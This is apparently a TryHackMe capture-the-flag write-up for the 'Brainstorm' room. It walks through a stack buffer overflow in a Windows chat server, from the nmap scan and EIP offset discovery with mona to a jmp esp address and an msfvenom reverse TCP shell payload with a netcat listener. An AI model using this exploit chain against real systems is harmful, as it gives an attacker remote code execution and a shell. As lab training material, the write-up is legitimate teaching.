TryHackMe — Brainstorm
Reverse engineer a chat program and write a script to exploit a Windows machine.
NMAP Scan:
nmap -sC -sV -Pn -T4 10.10.175.210 — disable-arp -oX chatserver_nmap.xml
- sC = default scrip scan
- sV = version scan
- n = disable DNS resolution
- T4 = Aggressive scan
First step is to grab the chatserver.exe and essfunc.dll using ftp from the target machine to your local machine for debugging.
Open Immunity Debugger as Administrator from your local machine then attach chatserver.exe and hit F9 to run the program.
Check how the application behaves using netcat. The vulnerable part of this application is the “Write a message:”.
Simple python script that will send bunch of As to the application:
This script will try to send 2500 As and check if the chatserver crashes.
Run python script:
Successfully crashed the application and overwritten the EIP:
Check the exact EIP offset using msf-pattern_create -l 2500.
- l = length of the pattern
Copy the output then replace the 2500 As with it from the python script.
Go back to the Immunity debugger then hit F12 to restart then hit F9 again to run the chatserver.exe
Execute python script again then check Immunity. Once again we have crashed the application but this time take note of the EIP address.
Locate the exact offset of EIP using !mona or msf-pattern_offset:
Using mona:
Using msf:
Edit python script and change the pattern back to bunch of As but now multiplied by 2012 as the result of the EIP offset. In addition, running this script should overwrite the EIP with 4 Bs or 42424242.
Once again, restart the Immunity debugger and run the chatserver.exe then execute the python script.
Now that we have confirmed that we have overwritten the EIP, let’s now check for bad chars.
Generate bytearray in Immunity debugger using mona:
Set working folder in Immunity Debugger:
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b “\x00”
Edit python script to add byte arrays, you can search for these badchars in google just don’t forget to remove the “\x00”.
Restart the immunity debugger and run the chatserver.exe then run the python script. Once again, the application crashed. Let’s compare the bytearray to our ESP address:
!mona compare -f C:\mona\chatserver\bytearray.bin -a 018DEEC0
Let’s now locate a jump point address.
!mona jmp -r esp -cpb “\x00”
Copy one jmp esp address then edit our python script:
Transform to address to little endian:
625014DF = \xdf\x14\x50\x62
Add NOP Sled before the payload:
“\x90” * 32
Create msfpayload:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.203.128 LPORT=4444 -f python — var-name buffer EXITFUNC=thread -b “\x00”
Run netcat listener then run the script:
nc -lvnp 4444
To exploit the TryHackMe box, you just need to change the payload in accordance to the target’s IP address.
References:
